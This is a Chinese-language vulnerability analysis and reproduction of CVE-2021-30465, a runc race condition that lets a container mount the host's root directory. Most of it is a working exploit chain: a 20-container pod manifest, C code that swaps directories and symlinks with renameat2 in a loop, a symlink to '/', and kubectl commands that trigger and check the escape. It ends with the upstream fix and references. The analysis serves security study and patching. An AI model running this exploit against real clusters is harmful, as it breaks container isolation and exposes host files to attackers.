漏洞分析
CVE-2021-30465是一个runc漏洞,利用这个漏洞可以通过条件竞争攻击来将宿主的目录挂载到容器中。
在容器中挂载volume之前,runc会先调用SecureJoin()把挂载目标路径拼接到容器的根目录下并进行检查:如果路径中包含符号链接,则会在容器根目录的范围内将其解析为实际指向的路径[1.1]。
case "tmpfs":
copyUp := m.Extensions&configs.EXT_COPYUP == configs.EXT_COPYUP
tmpDir := ""
// dest might be an absolute symlink, so it needs
// to be resolved under rootfs.
dest, err := securejoin.SecureJoin(rootfs, m.Destination)
if err != nil {
return err
}
m.Destination = dest
stat, err := os.Stat(dest)
if err != nil {
if err := os.MkdirAll(dest, 0755); err != nil {
return err
}
}
......
if copyUp {
if err := fileutils.CopyDirectory(dest, tmpDir); err != nil {
errMsg := fmt.Errorf("tmpcopyup: failed to copy %s to %s: %v", dest, tmpDir, err)
if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil {
return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg)
}
return errMsg
}
if err := unix.Mount(tmpDir, dest, "", unix.MS_MOVE, ""); err != nil {
errMsg := fmt.Errorf("tmpcopyup: failed to move mount %s to %s: %v", tmpDir, dest, err)
if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil {
return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg)
}
return errMsg
}
}
通过条件竞争的方式,可以在路径检查和挂载操作之间将正常路径替换为符号链接。在检查阶段,路径还不是符号链接,所以不会经过处理;而在检查之后、挂载之前,将路径替换为符号链接,这样这个符号链接指向的宿主系统的路径就会被挂载到容器中。
漏洞复现
系统:Ubuntu 20.04
Kubernetes:1.21.0
containerd:1.4.4
创建一个包含多个容器的pod,我这里包含了20个,配置文件内容如下:
apiVersion: v1
kind: Pod
metadata:
name: pod1
spec:
terminationGracePeriodSeconds: 1
containers:
- name: c1
image: ubuntu:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test2
- name: c2
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c3
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c4
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c5
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c6
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c7
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c8
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c9
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c10
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c11
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c12
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c13
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c14
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c15
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c16
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c17
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c18
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c19
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c20
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
volumes:
- name: test1
emptyDir:
medium: "Memory"
- name: test2
emptyDir:
medium: "Memory"
可以看到,除了第一个容器c1以外,其他容器(c2~c20)的镜像都是无效的,因此它们暂时无法启动,要等到后面exp运行起来、镜像被更新之后才会启动。c1挂载了一个test1卷和一个test2卷,其余每个容器都挂载了一个test1卷和5个test2卷。
获取创建好的pod的UID:
# Print only the pod's own UID (.metadata.uid) followed by a newline.
# Querying the field directly avoids grepping YAML, which prints the key and
# indentation and would match any other line that happens to contain "uid".
sudo kubectl get pod pod1 -o jsonpath='{.metadata.uid}{"\n"}'
编写exp,其中的24a602eb-62e2-47dd-a083-9f44489582d6为刚刚获取的UID:
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/wait.h>
/*
 * Proof-of-concept helper for the race described in this write-up.
 *
 * Forks up to four children. Child i creates directory name_mnts[i] and a
 * symlink name_tmps[i] -> ld in the current working directory, then swaps the
 * two names forever with renameat2(RENAME_EXCHANGE). The parent blocks in
 * wait().
 *
 * argc/argv are unused. No return value of open/fork/mkdir/symlink/renameat2
 * is checked.
 */
int main(int argc, char *argv[]) {
/* Directory names; each child creates and keeps swapping one of them. */
char *name_mnts[] = {"mnt1", "mnt2", "mnt3", "mnt4"};
/* Symlink names paired index-by-index with name_mnts. */
char *name_tmps[] = {"mnt-tmp1", "mnt-tmp2", "mnt-tmp3", "mnt-tmp4"};
/* Target of every symlink; the pod UID in this path must be edited by hand. */
char *ld = "/var/lib/kubelet/pods/24a602eb-62e2-47dd-a083-9f44489582d6/volumes/kubernetes.io~empty-dir/";
/* Descriptor for the current directory; both renameat2 names are relative to it. */
int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
pid_t pid;
int i;
/* Spawn up to four children; a child leaves the loop holding its own index i. */
for (i=0; i<4; ++i)
{
pid = fork();
if (pid == 0)
break;
}
/*
 * Parent (pid != 0, which also covers a failed last fork returning -1):
 * wait(NULL) returns after a single child terminates, so the remaining
 * children are not reaped here.
 */
if (pid != 0)
wait(NULL);
else {
/* Child: create the directory and the symlink that will trade names. */
mkdir(name_mnts[i], 0755);
symlink(ld, name_tmps[i]);
/*
 * RENAME_EXCHANGE atomically swaps the two names, so name_mnts[i] alternates
 * between being a directory and being the symlink. The loop never exits;
 * the child runs until it is killed.
 */
while (1)
renameat2(dirfd, name_mnts[i], dirfd, name_tmps[i], RENAME_EXCHANGE);
}
return 0;
}
将编译好的exp文件放到c1容器中的/test1目录下,然后创建一个符号链接:
ln -s / /test2/test2
接着cd到/test1目录,运行exp。exp开始运行之后,回到宿主,更新其他容器的镜像使它们启动:
# Replace the placeholder image of containers c2..c20 with a real one so that
# they start.
for ((c = 2; c <= 20; c++)); do
  sudo kubectl set image pod pod1 "c${c}=ubuntu:latest"
done

列出每个容器的/test1/zzz目录下的内容:
# For containers c2..c20, print the container name and then the contents of
# its /test1/zzz mount point.
for ctr in c{2..20}; do
  echo "${ctr}"
  sudo kubectl exec -it pod/pod1 -c "${ctr}" -- ls /test1/zzz
done

在上面命令的输出结果中,可以看到c20成功获取到了宿主根目录的内容。由于利用依赖条件竞争,每次复现时成功的容器可能不同,也可能需要多次尝试。
官方修复
在挂载之前,runc会先以O_PATH方式打开目标路径,再通过/proc/self/fd读取该fd实际指向的路径,确保它与预期的挂载路径一致,否则拒绝操作,从而防止挂载目标在检查之后被替换为符号链接[3.1]。
fh, err := os.OpenFile(path, unix.O_PATH|unix.O_CLOEXEC, 0)
if err != nil {
return fmt.Errorf("open o_path procfd: %w", err)
}
defer fh.Close()
// Double-check the path is the one we expected.
procfd := "/proc/self/fd/" + strconv.Itoa(int(fh.Fd()))
if realpath, err := os.Readlink(procfd); err != nil {
return fmt.Errorf("procfd verification failed: %w", err)
} else if realpath != path {
return fmt.Errorf("possibly malicious path detected -- refusing to operate on %s", realpath)
}
参考
[1.1] https://github.com/opencontainers/runc/blob/v1.0.0-rc93/libcontainer/rootfs_linux.go#L340
[2.1] https://blog.champtar.fr/runc-symlink-CVE-2021-30465/
[3.1] https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f